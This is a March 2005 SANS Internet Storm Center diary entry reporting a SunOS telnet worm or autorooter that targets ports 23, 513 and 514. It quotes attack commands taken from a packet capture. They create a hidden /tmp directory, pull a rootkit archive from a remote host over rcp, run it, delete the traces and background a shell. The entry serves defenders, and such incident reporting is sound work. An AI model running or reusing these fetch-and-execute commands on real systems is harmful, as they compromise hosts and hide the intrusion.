Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Internet Security | DShield SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Yatze telnet worm; InfoCon update; rlogin link to telnet maybe?
SunOS telnet worm on the loose Watch ports 23, 513 and 514

The telnet port(23) is being targeted and rcp is the download port(514)

used to grab the worm/autorooter kit via rcp.

We have received several reports of what appears to be a telnet negotiation
exploit with autorooter or worm like qualities.

Further reports shows many of the hosts being reported for telnet scans

are also being reported for a rlogin bruteforce on port 513

It was reported that the probes for port 23 began on 03/20/2005

Looking at shows 23 has been fairly active but the

number of targets had a large increase on 03/23/2005.

I pulled these commands from a user provide tcpdump file :

mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
news@`/usr/bin/uname -m`.tar . >

echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>

echo cd rk \; /bin/sh go >>

echo cd / \; rm -rf /tmp/.m/\* \; rm -rf /tmp/.m >>

/usr/bin/nohup /bin/sh >/dev/null 2>/dev/null &
We have not gotten a copy of the actual worm/autorooter yet

If you have a copy we would like to analysis it
I looked at most of the port 23 "violators"

are also showing up for attempting to bruteforce guess the password

on port 513 (rlogin).

InfoCon Alert Status Calibration

We have received a lot of emails about our InfoCon Alert Status

since yesterdays diary requested your feedback/opinions of it.

We will review them and consider each suggestion.

Please keep submitting in your ideas via the contact page.

206 Posts
Mar 26th 2005

Sign Up for Free or Log In to start participating in the conversation!